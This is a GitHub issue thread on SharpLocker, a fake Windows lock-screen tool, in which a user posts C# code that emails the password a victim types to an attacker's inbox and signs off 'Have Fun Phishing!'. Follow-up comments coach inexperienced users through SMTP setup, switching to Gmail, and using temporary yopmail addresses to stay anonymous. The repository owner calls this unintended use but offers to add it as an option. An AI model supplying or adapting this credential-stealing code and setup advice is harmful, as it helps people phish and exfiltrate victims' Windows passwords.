### ISSUE TITLE
Enhancement **Send Password to your email**

### ISSUE THREAD

**Issue by JaniniRami** [Pickfordmatt/SharpLocker#9]
<b>To get the password to be sent to your email, insert the code below in the button1_Click_1 function at the end of the Form_1.cs file and it will look something like this:

```
private void button1_Click_1(object sender, EventArgs e)
        {

            MailMessage msg = new MailMessage("<from@email(outlook)", "<to@email>", "Windwos Password", textBox2.Text);
            msg.IsBodyHtml = true;
            SmtpClient sc = new SmtpClient("smtp-mail.outlook.com", 587);
            sc.UseDefaultCredentials = false;
            NetworkCredential cre = new NetworkCredential("<from@email(outlook)>", "<from@email(password)");//your mail password
            sc.Credentials = cre;
            sc.EnableSsl = true;
            sc.Send(msg);

            Taskbar.Show();
            System.Windows.Forms.Application.Exit();
        }
    }
```
Have Fun Phishing!

**Comment by JaniniRami** [comment]
****Make sure to add those libraries in the top of the program to work!****
```
using System.Net;
using System.Net.Mail;
using System.Net.Mime;
```

**Comment by ptlthg** [comment]
For people with little experience how to do this... (definitely not me). What email should be used as the "from" email?

**Comment by JaniniRami** [comment]
You must create an <b>outlook account</b>, this account will be the <b>from@account</b> for example <b>(email@outlook.com)</b>, you must type the password of the account you made so that you give permission for the program to use that outlook account to send mails.

While  <b>to@email</b>(the account that you will receive the password on), could be any email; you're personal one such as Gmail, Outlook, Yahoo..., or in some scenarios where you want to stay anonymous in some attacks you can even use some temp-mails from websites such as <b>(http://www.yopmail.com)</b>, that will generate anonymous temporary accounts to send the phished password to it.

**Comment by Pickfordmatt** [comment]
Hi All,

This is not actually the intended use of SharpLocker, the reason for choosing a .NET language was to enable direct loading of the exe into memory via CobaltStrikes 'Execute-Assembly' or other similar alternatives.

I'm more than happy to look into doing this, however it will require argument flags rather than being default functionality.

Cheers,
Matt

**Comment by old-alexlmao** [comment]
> MailMessage msg = new MailMessage("<from@email(outlook)", "<to@email>", "Windwos Password", textBox2.Text); 

what do i change in <from@email(outlook)", "<to@email> for it to work?

**Comment by JaniniRami** [comment]
> 
> 
> > MailMessage msg = new MailMessage("<from@email(outlook)", "[to@email](mailto:to@email)", "Windwos Password", textBox2.Text);
> 
> what do i change in <from@email(outlook)", "[to@email](mailto:to@email) for it to work?

from@email(outlook), will be the email that you will be sending the password from(any outlook email you create or have), and you will need to provide its password in the <from@email(password)> so you give it permission to send emails as shown in my first comment! https://github.com/Pickfordmatt/SharpLocker/issues/9#issuecomment-581230547
to@email, will be you personal email that you will receive the password on.

**Comment by leo120134** [comment]
Hi there. on the link that leads to outlook, i can only log in with a school account or work account that i don't have. are there any other links that I can use instead of the link "smtp-mail.outlook.com"?

**Comment by JaniniRami** [comment]
Yes, you can use Gmail smtp server instead my changing "smtp-mail.outlook.com" to "smtp.gmail.com" and use a gmail account instead, but using Gmail comes with some attached strings, you need to enable smtp on your gmail account, Here is how to do it according to ARCLAB blog:

 Enable Third-Party Mail Clients

Google may block (by default) third-party (less secure) mail clients like e.g. Outlook, Thunderbird, MailList Controller or Inbox2DB.

 

See: https://support.google.com/accounts/answer/6010255?hl=en for details.
The page contains a link to enable "Less secure apps" in MyAccount.
You can also enable "Less secure apps" (third-party mail clients) from:
"MyAccount" > "Sign-in & security" > "Connected apps & sites" > "Allow less secure apps"

**Comment by leo120134** [comment]
thank you for answering,

in my gmail account, i changed it. But in my outlook acc, i cant change the POP server or anything else.   is there any other way?
